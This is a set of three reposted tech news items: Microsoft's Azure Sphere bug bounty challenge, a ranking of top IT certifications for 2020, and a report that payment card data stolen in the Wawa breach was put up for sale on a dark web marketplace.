In an effort to identify potentially serious vulnerabilities in Azure Sphere, Microsoft has decided to run a three-month application-only challenge.

Hackers can apply for the Azure Sphere Research Challenge until May 15, and the challenge will run between June 1 and August 31. Researchers whose applications have been accepted will receive an email from Microsoft.

This new initiative, an expansion of the Azure Security Lab project announced last year, invites researchers to find vulnerabilities that would allow them to execute code on the Pluton security subsystem, which is the hardware-based secured root of trust for Azure Sphere, or in the Secure World operating environment of the Azure Sphere application platform. Microsoft is prepared to pay out up to $100,000 for these types of exploits.

While this research focuses on the Azure Sphere OS, vulnerabilities in other components could still receive a reward through the public Azure bug bounty program.

For the Azure Sphere Research Challenge, Microsoft has teamed up with several cybersecurity solutions providers, including Avira, Baidu, Bitdefender, Bugcrowd, Cisco, ESET, FireEye, F-Secure, HackerOne, K7 Computing, McAfee, Palo Alto Networks and Zscaler.

“While Azure Sphere implements security upfront and by default, Microsoft recognizes security is not a one-and-done event. Risks need to be mitigated consistently over the lifetime of a constantly growing array of devices and services. Engaging the security research community to research for high-impact vulnerabilities before the bad guys do is part of the holistic approach Azure Sphere is taking to minimize the risk,” Microsoft said.

via:  securityweek


Top IT Certifications for 2020

Whether you’re new to the IT field or deep in the technology trenches, knowing what is hot and, sometimes more importantly, what is not, can be critical to the next step in your career path. That’s why we’ve got you covered with the latest and greatest certifications that should be on your radar, based on sales trends and unshakeable predictions from a team of experts. So, let’s dive in on what you should be looking to get certified in for 2020!

10. CompTIA Linux+ (XK0-004)

What is new is old again! With the resurgence of Linux distros in the security and cloud realms, it is little surprise that brushing up on your bash scripting and command-line troubleshooting is what employers want to see these days. CompTIA released a new version of their Linux+ certification in October, streamlining their previous two exams into one and adding in security ninja skills to XK0-004.

9. Microsoft MCSA SQL Development (70-76x)

Cloud databases may be all the rage, but the basics are still in style. The staying power of Microsoft MCSA SQL Development (70-76x) among database admins and developers is a strong testament to that. We predict that business intelligence solutions around Azure will grow to eventually replace this certification, but not anytime soon. Whether on-premises or in the cloud, this certification hasn't lost its shine within the database market.

8. (ISC)2 CISSP (CAT, April 2018)

Despite interest in other specializations like CCSP and CSSLP, the CISSP continues to be the top dog in the security industry. Although slipping in this list compared to other IT certifications, CISSP remains a gold standard that any IT professional, especially in a management role, should consider. These initials are not disappearing from the thousands on LinkedIn anytime soon!

7. Cisco CCNA (200-301)

Although well-known in networking circles, the CCNA has remained the same certification program for many years now. But in the Summer of 2019, all of that changed with a new blueprint emphasizing cloud-based automation. You’ve got until February to test on the old CCNA exam objectives, but stay tuned for a huge update that will be sending network engineers scrambling to update their skills and prove their mettle in 2020!

6. Oracle 12c SQL OCA (1Z0-071)

From self-healing databases and automated cloud AI, the Oracle database has many bells and whistles and still remains a popular choice for large, multinational enterprises. Not without its controversial claims, there is no doubt it is a titan in the database realm, and skilled administrators are in high demand. This is one of the first exams needed to certify as an Oracle Certified Associate (OCA). We saw this title jump into the top ten last year and believe it is a trend we’ll continue to see in 2020.

5. Network+ (N10-007)

This may seem like a head-scratcher, but it is clearly based on our 2019 numbers that more newbies are willing to learn the dark arts of networking. Some of these can be explained away by the huge IoT demand and the growing needs to better support the infrastructure for these devices. As we become more connected, we’ll need to grow the workforce to ensure those connections stay reliable and secure. Also as part of what many consider a core understanding of cybersecurity starting in A+, Network+, and Security+, it is a great start to whatever branch of cybersecurity you are interested in. With that in mind, it’s good to see some growth in this introductory networking certification.

4. EC-Council CEH (v10)

Certified Ethical Hacker is still the ultimate in red team certification, enticing many a hacker into the cameras-lights-action of penetration testing. This is a great, high-level introductory look into the world of a white hat hacker, as it covers ethics, reporting, and a general review of the types of tools used. Though we predict that this certification will continue to grow in 2020, expect blue team related certifications like Certified Network Defender (CND) to rise as more organizations focus on automated protection and scanning over manual exploitation.

3. CompTIA Security+ (SY0-501)

As the IT skills gap, especially in the security space, continues to exist, more individuals will be gravitating to the field with little or no knowledge. Vendor-neutral certifications targeted at the entry level, specifically well-known ones like Security+, will continue their popularity, as Security+ is again part of the core understanding, giving a high-level look across the field of cybersecurity. This certification has dropped a couple of spots since last year, mainly because more IT professionals are honing their existing skills or dipping their toes into more specialized security professions. If 2019 was the year of security, expect 2020 to re-emphasize traditional IT roles.

2. Microsoft MCSA Windows Server (70-74x)

This certification is also showing some age, but Windows system admins are still needed even in the age of Azure. So it is no surprise that this certification continues to be popular. We expect continued popularity in 2020, but we're also watching the trend of companies moving toward machine learning to maintain their virtualized networking solutions. Although not as many companies adopted machine learning in 2019 as expected, and adoption is not likely to increase significantly in 2020, it is a long-term trend that we're keeping our eyes on.

1. CompTIA A+ (220-100x)

The future in IT has never been greater with more advanced devices requiring more skilled technicians to manage them. The new 2019 exam emphasizes the newest technologies found in the field, making it a must for a full-fledged hardware technician, or anyone looking to hone their tech support skills. We expect to see this certification’s popularity only grow in 2020.

Honorable Mentions

CCNA CyberOps

This was a new Cisco specialization in 2018, but we’re finally seeing some growth here. Keep your eye on this space.

This agile project management certification is one of PMI’s fastest growing, but it’s still not as popular as other project management certs. In 2020, this certification will remain a force to be reckoned with, even as the field of agile certification continues to widen.

Microsoft MCSA Azure

The slew of new Azure certifications, hot on the heels of the huge moves from various enterprises, including the DoD, ensure this certification will only grow in 2020. By adding performance-based labs to these exams, expect to see more and more cloud admins/developers jump on the bandwagon.

Slow to catch on until late last year, this certification is now growing steadily. We have every reason to expect its popularity among candidates will only grow in 2020. This certification sits right below the CASP and above the Security+ as an interesting intersection between a security auditor and analyst.

via:  kaplanittraining


Wawa Breach: Hackers Put 30 Million Stolen Payment Card Details for Sale

Remember the recent payment card breach at Wawa convenience stores?

If you’re among those millions of customers who shopped at any of 850 Wawa stores last year but haven’t yet hotlisted your cards, it’s high time to take immediate action.

That’s because hackers have finally put up payment card details of more than 30 million Wawa breach victims on sale at Joker’s Stash, one of the largest dark web marketplaces where cybercriminals buy and sell stolen payment card data.

As The Hacker News reported last month, on 10th December Wawa learned that its point-of-sale servers had malware installed since March 2019, which stole payment details of its customers from potentially all Wawa locations.

At that time, the company said it’s not aware of how many customers may have been affected in the nine-month-long breach or of any unauthorized use of payment card information as a result of the incident.

Now it turns out that the Wawa breach ranks among the largest payment card breaches in United States history, potentially exposing 30 million sets of payment records.


According to threat intelligence firm Gemini Advisory, on 27th January 2020, hackers started uploading stolen payment card data from Wawa at Joker’s Stash marketplace, titled as ‘BIGBADABOOM-III,’ which reportedly includes card numbers, expiration dates, and cardholder names.

“While the majority of those records were from US banks and were linked to US-based cardholders, some records also linked to cardholders from Latin America, Europe, and several Asian countries,”  Gemini Advisory said.

“Non-US-based cardholders likely fell victim to this breach when traveling to the United States and transacting with Wawa gas stations during the period of exposure.”

“The median price of US-issued records from this breach is currently $17, with some of the international records priced as high as $210 per card.”

In the latest statement released yesterday, Wawa confirmed that the company is aware of reports of criminal attempts to sell customers’ payment card data and to help further protect its customers, the company has ‘alerted payment card processors, payment card brands and card issuers to heighten fraud monitoring activities.’

“We continue to encourage our customers to remain vigilant in reviewing charges on their payment card statements and to promptly report any unauthorized use to the bank or financial institution that issued their payment card by calling the number on the back of the card,” Wawa said.

Customers who bought anything at any Wawa convenience store between March and December last year are advised to block the affected cards and request new ones from their respective financial institutions.

via:  thehackernews
